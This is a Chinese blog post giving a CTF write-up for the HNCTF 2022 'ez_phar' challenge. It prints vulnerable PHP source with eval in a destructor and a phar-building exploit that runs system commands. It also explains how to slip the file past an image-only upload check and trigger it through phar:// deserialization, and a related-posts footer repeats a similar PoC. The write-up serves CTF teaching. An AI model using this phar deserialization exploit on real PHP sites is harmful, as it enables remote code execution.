[HNCTF 2022 WEEK3]ez_phar

最新推荐文章于 2024-07-29 22:50:36 发布
最新推荐文章于 2024-07-29 22:50:36 发布
阅读量339 收藏 1
点赞数
分类专栏: CTF 文章标签: php 网络安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68906365/article/details/129679109
版权

一、源码

<?php
show_source(__FILE__);
class Flag{
    public $code;
    public function __destruct(){
    // TODO: Implement __destruct() method.
        eval($this->code);
    }
}
$filename = $_GET['filename'];
file_exists($filename);
?>

二、解法

提示upload something,猜测可能存在上传文件的界面。访问upload.php:

发现可以上传文件。因为源码中存在file_exists()函数,可以利用phar反序列化。

基本思路就是利用上传的phar文件进行反序列化利用。

生成phar文件:

<?php
class Flag{
    public $code = "system('cat /ffflllaaaggg');"; //system('ls /');
}
$a = new Flag();


$phar = new phar('b.phar');//对phar对象进行实例化,以便后续操作。


$phar -> startBuffering();//缓冲phar写操作(不用特别注意)


$phar -> setStub("<?php __HALT_COMPILER(); ?>");//设置stub,为固定格式


$phar -> setMetadata($a);//把我们的对象写进Metadata中


$phar -> addFromString("test.txt","helloworld!!");//写压缩文件的内容,这里没利用点,可以随便写


$phar -> stopBuffering();//停止缓冲
?>

然后上传,发现只允许上传图片,修改之后上传成功。

利用phar协议读取:

/?filename=phar://upload/b.jpeg

成功拿到flag。

三、参考文章

PHP Phar反序列化总结_OceanSec的博客-CSDN博客

D2490
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2022 SWPU新生赛&HNCTF web部分题目
weixin_63231007的博客
11-02 3237
SWPU在start.php 界面抓个包,发包得到:F1l1l1l1l1lag.phpThinkPHP V5 rce 漏洞在网上可以找到现成的payload替换whoami命令为我们要执行的命令即可反序列化构造 assert(eval($_POST[1]));cat /flag即可ez_1zpop之后把属性改大一位,绕过__wakeup()函数numgame查看js源码发现了NsScTf.php
re [HNCTF 2022 WEEK3]Help_Me! 复现
m0_75098930的博客
04-21 148
使输入的课对应的序号相加小于等于200,乘积最大,就这么个小东西,我写了好久,最开始想递归爆破吧,应该是编程能力太差了,写了好几次都不行,想到原来稍微学了一点的整数规划,cvxpy救大命了。解出的结果是[0. 1. 0. 0. 1. 0. 1. 0. 0. 0. 1. 0. 1. 1. 0. 0. 0. 0. 1. 1.],也就是1 4 6 10 12 13 18 19。64位exe,无壳,逻辑倒是很简单。
NSSCTF中的Vim yyds、Interesting_include、[HUBUCTF 2022 新生赛]checkin、EZ WEB、泄露的伪装、hate eat snake、ez_ez_php
2401_82388450的博客
05-21 760
1.复习了vim缓存文件的解题方法2.学习到了true和非空、非零字符串比较都是为true,了解到了php弱比较的一种解题方式3.了解到了Flask 框架以及在bp中发送PUT请求。
[HNCTF 2022] web 刷题记录
rev1ve的博客
09-02 1131
简单分析一下,fsockopen能够使用socket与服务器进行tcp连接,并传输数据,host、port和数据都能定义,存在SSRF。这里应该是从index.php传参,ssrf然后访问到flag.php。F12查看,修改一下maxlength的值为11位。根据提示,传一个我们想要的,那就传flag咯。发现要求我们输入手机号,可是只能输10位。然后是修改cookie为admin,添加。然后随便输入11位,即可得到flag。然后让我们选择要哪个,这里发现。,然后ls看一下目录。
CTF笔记 个人HNCTF反思(部分题目)
qq_51248658的博客
10-31 2105
[WEEK2]easy_include、[WEEK2]easy_unser、[WEEK2]easy_sql、[WEEK2]ez_SSTI、[WEEK4]pop子和pipi美
php_phar.zip
11-23
3. **Phar的运行时行为** - **自动加载**:通过设置Phar的自动加载函数,可以简化代码的加载过程。 - ** stub**:启动脚本,用于引导Phar文件的执行。通常包含PHP代码,可以定义入口点和执行逻辑。 - **解压和...
__Project_OnlineShoppingSystem_pythonproject_python_project_phar
09-29
Python project for online pharmacy system
codecept.phar
09-23
codecept.phar 测试程序,移动该文件至 存放php 根目录中 存放 php.exe的地方 创建: codecept.bat 输入: ``` @php "%~dp0codecept.phar" %* ``` 使用说明:...
mix-phar-skeleton:Phar命令行程序开发框架
04-24
Mix Phar Skeleton 命令行单执行文件 Phar 开发程序骨架,Mix 封装的命令行基础设施在骨架中都可使用。 我们提供了打包工具 ,可以将本项目打包为 Phar 文件(就像 golang 编译成执行文件一样)。 PHP 原本就是一个...
phpphar包的使用教程详解
10-17
3. 使用`ll`命令查看新创建的`test.phar`文件。 ### 解压过程 1. 创建解压脚本,例如`depress.php`,用于将`phar`文件内容解压到指定目录: ```php define('ROOT', __DIR__); $dir = ROOT.'/extract'; if (!is_...
2022HNCTF-web
bossDDYY的博客
10-30 3212
应该和http协议有关 想要什么 肯定flag说我们不是admin 看看cookie修改cookie继续修改 x-forwarded-for [Week1]2048 分析 题目描述你能达到20000分吗?应该是要求我们玩到20000分F12查看脚本直接输入在控制台输入 [Week1]easy_html 分析 输入框限制了11位 f12修改html属性 或者直接post参数 [Week1]Interesting_include 分析 题目描述:web手要懂得搜索 应该要借助浏览器一眼伪协议base64解码 [
[ByteCTF 2019]EZCMS 详解(hash长度扩展攻击+phar反序列化)
qq_45699846的博客
03-22 1954
[ByteCTF 2019]EZCMS 详解(hash长度扩展攻击+phar反序列化)
2022HNCTF-re部分题解
weixin_61154173的博客
12-04 1227
2022HNCTF-re部分
[D3CTF 2019]EzUpload gzip压缩phar .htaccess内容正则绕过 glob://爆破目录 绕过open_basedir
a3320315的博客
02-21 1595
源码 <?php class dir{ public $userdir; public $url; public $filename; public function __construct($url,$filename) { $this->userdir = "upload/" . md5($_SERVER["HTTP_X_REAL_I...
ctfphp常见的考点
热门推荐
一个安全研究员
11-06 1万+
本博文转自:大佬博客(侵权删) 总结的很详细,忍不住转载 系统变量 123456 $_POST // 获取 post 数据,是一个字典$_GET // 获取 get 数据,是一个字典$_COOKIE // 获取 cookie$_SESSION // 获取 session$_FILE // 获取上传的文件$_REQUEST // 获取 $_GET,$_POST,$_C
记一道CTF中的phar反序列化
qq_53886354的博客
08-14 2350
通过config的值去控制文件读写, 审计一下正则发现基本上把伪协议都过滤了, 直接new getflag也不行,这种情况下十六进制类名也绕不了,再仔细审计一下发现虽然phar伪协议没有作限制。这一块实在是没什么思路去绕过, 于是参考了一下xenny和atao两位师傅的wp, 此处用的是xenny师傅的思路, 修改文件内容 -> 签名修复 -> 文件上传。, 大致原理就是用其他的压缩格式再对phar文件进行压缩达到混淆的效果, 部分压缩格式混淆过的phar内容同样可以直接被phar://伪协议解析。....
这款ERP云进销存系统,直接封神
魔法标记
07-29 485
一套用php写的ERP云进销存系统,快速部署,直接使用,简直是小公司和个体户的神器。
WordPress原创插件:搜索引擎抓取首图seo图片
最新发布
爱酷码的博客
07-29 300
WordPress原创插件:搜索引擎抓取首图seo图片。
phar反序列化poc
05-21
Phar反序列化漏洞是指攻击者利用PHP中的Phar文件解析器对不受信任数据进行反序列化攻击的一种安全漏洞。攻击者可以通过构造特定的Phar文件,触发解析器反序列化恶意代码,从而实现远程代码执行。 一个简单的Phar反序列化POC如下: ``` <?php class Example { public $command; } $phar = new Phar('phar.phar'); $phar->startBuffering(); $phar->setStub('<?php __HALT_COMPILER(); ?>'); $example = new Example(); $example->command = 'echo "Hello World";'; $phar->setMetadata($example); $phar->stopBuffering(); include 'phar://phar.phar/test.txt'; ?> ``` 上述POC中,攻击者创建了一个含有恶意代码的Phar文件,并将其反序列化到`$example`变量中,最后通过`include`语句触发远程代码执行。 相关问题: 1. 什么是Phar文件? 2. 什么是反序列化漏洞? 3. 如何防范Phar反序列化漏洞?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值